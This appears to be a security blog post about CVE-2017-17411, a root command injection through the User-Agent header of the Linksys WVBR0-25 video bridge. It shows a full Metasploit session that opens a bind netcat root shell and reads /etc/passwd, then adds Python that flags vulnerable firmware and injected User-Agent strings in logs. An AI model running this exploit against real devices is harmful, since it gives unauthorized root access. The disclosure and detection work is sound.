Recently, security researcher Ricky Lawshae of Trend Micro discovered a critical vulnerability in the Linksys WVBR0-25 wireless bridge that allows remote attackers to execute arbitrary code on vulnerable installations of the device.
Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal, which does not properly validate user-supplied data before passing it to a system call. An attacker could leverage this vulnerability to execute code with root privileges.
Getting a Root Shell on a Linksys WVBR0-25
Exploit:
exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth Metasploit module
This module exploits vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vulnerability in question is a command injection caused by improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to "; #. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect
  wireless Genie cable boxes to the Genie DVR, is vulnerable to OS command
  injection in version < 1.0.41 of the web management portal via the
  User-Agent header. Authentication is not required to exploit this
  vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600

id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output: root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
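From the defender's side, the two facts above (firmware below 1.0.41 is affected, and the injection rides in the User-Agent header) are enough to check a device's reported version and to hunt the web server's access log for the kind of header the module sends. The following Python is an added example, not part of the original post or of the Metasploit module; the log lines are constructed samples in combined log format, and the metacharacter list is my own heuristic.

```python
import re
from typing import Dict, List, Optional, Tuple

# Firmware versions below this are the vulnerable ones named on the page.
FIXED_VERSION = (1, 0, 41)

# Combined-log-format parser. The User-Agent is the last quoted field and is
# matched greedily so that an injected header's embedded quotes stay in it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# A genuine User-Agent never contains a double quote, a backtick, "$(",
# "&&" or "||". A bare ";" is deliberately not matched because legitimate
# agents such as "Mozilla/5.0 (X11; Linux x86_64)" contain one.
SHELL_META_RE = re.compile(r'["`]|\$\(|&&|\|\|')

# Constructed sample log lines (not from the page). The second carries a
# User-Agent of the '"; ... #' shape the module sends.
SAMPLE_LOG: List[str] = [
    '10.0.0.109 - - [21/Dec/2017:17:09:50 -0600] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.109 - - [21/Dec/2017:17:09:54 -0600] "GET / HTTP/1.1" 200 512 "-" ""; id #"',
    '10.0.0.50 - - [21/Dec/2017:17:10:01 -0600] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/7.58.0"',
]

def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a dotted firmware string such as '1.0.40' into a comparable tuple."""
    return tuple(int(part) for part in version.strip().split("."))

def is_vulnerable_firmware(version: str) -> bool:
    """True when the reported firmware is older than the 1.0.41 fix."""
    return parse_version(version) < FIXED_VERSION

def parse_line(line: str) -> Optional[Dict[str, str]]:
    match = LOG_RE.match(line)
    return match.groupdict() if match else None

def find_user_agent_injection(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client IP, User-Agent) for requests whose agent carries shell metacharacters."""
    hits = []
    for line in lines:
        record = parse_line(line)
        if record and SHELL_META_RE.search(record["agent"]):
            hits.append((record["ip"], record["agent"]))
    return hits

if __name__ == "__main__":
    for ip, agent in find_user_agent_injection(SAMPLE_LOG):
        print(f"possible User-Agent command injection from {ip}: {agent!r}")
```

On the real device the log format and version string location will differ, so treat the parser and the version check as the shape of the rule rather than a drop-in signature.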
References:
- http://zerodayinitiative.com/advisories/ZDI-17-973/
- http://www.cve.mitre.org
- https://github.com/rapid7/metasploit-framework/pull/9336